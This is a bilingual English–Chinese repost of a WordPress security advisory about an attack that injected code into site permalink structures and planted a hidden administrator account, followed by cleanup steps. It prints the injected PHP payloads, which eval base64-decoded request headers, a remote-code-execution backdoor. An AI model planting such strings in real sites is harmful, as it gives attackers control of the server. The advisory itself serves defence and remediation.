针对近期WordPress站点遭受的SQL注入攻击,本文提供了详细的解决方案。攻击导致站点永久链接失效,影响博客文章URL。修复步骤包括调整永久链接设置和清除非法用户。建议所有WordPress用户立即检查并采取行动。
wordpress注入
A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts URLs will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.
许多站点都受到最近SQL攻击的打击,其中将代码注入到您的站点。 这种MySQL注入会使其无效,从而影响您的永久链接。 因此,您的博客文章网址将无法使用。 这次攻击的目标是众多WordPress博客,这要感谢Andy Soward引起我们的注意。
There was one of the following codes that were added to your permalink structure due to this attack:
由于此攻击,您的永久链接结构中添加了以下代码之一:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
%&({$ {eval(base64_decode($ _ SERVER [HTTP_REFERER]))}} .. +)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
“ /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
These quotes appended all permalinks on your site and it can only be changed if removed manually.
这些引号会附加在您网站上的所有永久链接上,并且只有在手动删除后才能更改。
To fix this go to:
要解决此问题,请转到:
Settings > Permalinks and remove the above code and replace your default code.
设置>永久链接并删除上面的代码,并替换您的默认代码 。
Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.
接下来需要做的是转到用户。 您将看到有多个管理员。 您不会看到他们的名字,但是您会看到人数增加。 因此,您需要做的是查看所有用户,并找到最后一个注册的用户。 将鼠标悬停在该用户上并获取链接。 通过在该数字上加1来更改代码userid =。 因此,如果您看到的最后一个用户是用户#2,则将其添加1并将其设置为3。您应该发现隐藏的管理员的名字中有一个奇怪的代码。 删除代码并使其成为订户。 然后返回并删除他。
This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.
这应该可以解决问题。 您也可以通过直接转到PHPMyAdmin来删除他。 因为您将在那里看到用户。
We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.
我们只是想尽快发布此新闻,因此可以更新用户。 请确保您检查自己的博客没有被感染。 我们希望WordPress很快发布。
Also if you haven’t implement some of these measures to secure your WordPress Admin Area.
另外,如果您尚未实施某些措施来保护WordPress管理区域 。
翻译自: https://www.wpbeginner.com/news/wordpress-sql-injection-latest-attack/
wordpress注入
扫一扫
730
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
